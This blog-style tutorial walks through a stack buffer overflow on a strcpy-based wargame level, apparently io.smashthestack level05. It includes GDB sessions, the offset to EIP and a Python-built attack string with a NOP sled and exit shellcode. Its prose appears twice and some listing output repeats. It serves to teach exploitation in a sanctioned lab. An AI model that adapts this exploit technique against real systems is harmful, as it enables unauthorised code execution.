This is a continuation of my previous article on Stack Overflows - Basics of EIP Overwrite..I suggest a glance over it before reading further...
Again in this article we'll be using a vulnerable program to demonstrate our attack..
Our main motive is to change the direction of the vulnerable program and make it do what we want from it to do...
In this article I am now bringing the exploitation to a new level..We'll be exploiting a simple Wargame level example
And i'll be exploiting this code using their machine only..
I'll be using a basic exit shellcode for demonstration purposes but any shellcode of a considerable size can be used to exploit this program..
SO lets wear our grey thinking hats and get started..
Basically to exploit this program we have to overwrite th EIP register which we have already learnt How? In the previos tutorial...So...I'll nnot be repeating that...
Now what we want is to overwrite the EIP and make it point to our shellcode to gramt us the remote controler..
So lets first ssh to their machine :-
Note : i'll not be revealing the password for this level as its not allowed..
Lets now run it in GDB and exploit :-
Now lets just place a breakpoint at
Now lets place a breakpoint on the beginning of the program and lets run it...
Lets just run it with a argument of 160 A's..
We'll be using basic python code to make our Attack-string(input)...
Now just step down the program and see what happens
Ok that's pretty obvious that we have overwriiten the EIP with 0x41414141...(As its giving a cannot access memory at adress...As 0x41414141 is a random address and is not present in the present program user space and thus, the program cannot jump to it..)
Now lets try some various outputs to get a basic structure of what's happening..
So , now can you feel something …
It basically means that to overwrite EIP with our desired Address we conclude with the following attack string :-
Lets test it :-
Boom... We have total control over EIP overwrite...
Now we need to inject our shellcode..and point to it..
Lets first look where our data goes..
Ok so from the above we conclude with the following attack-string
So we have a large about of data space in the ESP..We can just overwrite it with our shellcode and overwrite the EIP with its address..
Lets do it!!
We'll again be using the same exit shellcode made in our previous article...
Woah!! We did it.. Now the explanation
Attack-string
The NOP-Sled is simply a set of \x90(nop) instructions this istruction basically does nothing..
We used this to make our attack-string more usable... as with every new execution of the program the address will somewhat change..If we'll not be using the nop sled … Our attack-string will fail...
Thats all for this article..Stay tuned for more
Again in this article we'll be using a vulnerable program to demonstrate our attack..
Our main motive is to change the direction of the vulnerable program and make it do what we want from it to do...
In this article I am now bringing the exploitation to a new level..We'll be exploiting a simple Wargame level example
And i'll be exploiting this code using their machine only..
Exploiting
Code: c
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[128];
if(argc < 2) return 1;
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
SO lets wear our grey thinking hats and get started..
Basically to exploit this program we have to overwrite th EIP register which we have already learnt How? In the previos tutorial...So...I'll nnot be repeating that...
Now what we want is to overwrite the EIP and make it point to our shellcode to gramt us the remote controler..
So lets first ssh to their machine :-
Code:
aneesh@aneesh-laptop:~$ ssh level5@io.smashthestack.org -p2224
level5@io.smashthestack.org's password:
______ _____
/\__ _\ /\ __`\
\/_/\ \/ \ \ \/\ \ Levels are in /levels
\ \ \ \ \ \ \ \ Passes are in ~/.pass
\_\ \__\ \ \_\ \
/\_____\\ \_____\ Server admin: beach (beach@smashthestack.org)
\/_____/ \/_____/ Server janitor: bla
1. No DoS, local or otherwise
2. Do not try to connect to remote systems from this box
3. Only two connections per IP are allowed
4. Quotas are in place so don't waste resources
5. This rules list is not all inclusive and is subject to change
6. Have fuN++
(28 levels)
- use long(>5char) names in /tmp, short stuff is periodically deleted, as are
easily guessable ones
- o and feel free to leave your email in /home/email.list (it's writeonly)
- Thanks everybody for the new translations!
level5@io:~$
level5@io:~$ cd /levels/
level5@io:/levels$ ls
beta level06_alt level10 level16 level23.c
level01 level06_alt.c level10.c level16.c level24
level02 level06_alt.pass level11 level16.pass level24.c
level02_alt level06.c level11.c level17 level25
level02_alt.c level07 level12 level17.c level25.c
level03 level07_alt level12.c level18 level26
level03.c level07_alt.c level12.pass level18.c level26.l
level04 level07.c level13 level18_cross level26.y
level04.c level08 level13.c level19 level27
level05 level08_alt level14 level19.c level27.c
level05_alt level08_alt.cpp level14.c level20 level27.pass
level05_alt.c level08.c level15 level21 level28
level05.c level09 level15.c level22 level28.c
level06 level09.c level15.pass level23
level5@io:/levels$ cat level0
level01 level04.c level06_alt.c level08
level02 level05 level06_alt.pass level08_alt
level02_alt level05_alt level06.c level08_alt.cpp
level02_alt.c level05_alt.c level07 level08.c
level03 level05.c level07_alt level09
level03.c level06 level07_alt.c level09.c
level04 level06_alt level07.c
level5@io:/levels$ cat level0
level01 level04.c level06_alt.c level08
level02 level05 level06_alt.pass level08_alt
level02_alt level05_alt level06.c level08_alt.cpp
level02_alt.c level05_alt.c level07 level08.c
level03 level05.c level07_alt level09
level03.c level06 level07_alt.c level09.c
level04 level06_alt level07.c
level5@io:/levels$ cat level0
level01 level04.c level06_alt.c level08
level02 level05 level06_alt.pass level08_alt
level02_alt level05_alt level06.c level08_alt.cpp
level02_alt.c level05_alt.c level07 level08.c
level03 level05.c level07_alt level09
level03.c level06 level07_alt.c level09.c
level04 level06_alt level07.c
level5@io:/levels$ cat level05
level05 level05_alt level05_alt.c level05.c
level5@io:/levels$
Lets now run it in GDB and exploit :-
Code:
level5@io:/levels$ gdb ./level05 GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... (gdb)
Now lets place a breakpoint on the beginning of the program and lets run it...
Code:
(gdb) break main Breakpoint 1 at 0x80483bd
We'll be using basic python code to make our Attack-string(input)...
Code:
(gdb) run `python -c 'print"\x41"*160'` Starting program: /levels/level05 `python -c 'print"\x41"*160'` Breakpoint 1, 0x080483bd in main ()
Code:
(gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0x41414141 in ?? () (gdb)
Now lets try some various outputs to get a basic structure of what's happening..
Code:
(gdb) run `python -c 'print"\x41"*140'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Cannot access memory at address 0x41414145 (gdb)
It basically means that to overwrite EIP with our desired Address we conclude with the following attack string :-
Code:
[Garbage string] [EIP]
| |
| |
Should be 140 The desired
chars long address overwrite
Code:
(gdb) run `python -c 'print"\x41"*140+"\x42"*4'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB 0x42424242 in ?? ()
Now we need to inject our shellcode..and point to it..
Lets first look where our data goes..
Code:
(gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC 0x42424242 in ?? () (gdb) x/10bx $esp 0xbfffdc80: 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0x43 0xbfffdc88: 0x43 0x43 (gdb)
Code:
[Garbage string] [EIP] [ESP]
| | |
| | |
Should be 140 The desired The desired
chars long address overwrite data to enter in esp(stack)
Lets do it!!
We'll again be using the same exit shellcode made in our previous article...
Code:
(gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'` Breakpoint 1, 0x080483bd in main () (gdb) s Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀ 0xbfffdc80 in ?? () (gdb) continue Continuing. Program exited with code 07. (gdb)
Attack-string
Code:
"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"
| | | |
| | | |
Garbage Hard coded [NOP - ] The exit shellcode
String address of esp in [SLED ]
the little endian format
We used this to make our attack-string more usable... as with every new execution of the program the address will somewhat change..If we'll not be using the nop sled … Our attack-string will fail...
Thats all for this article..Stay tuned for more
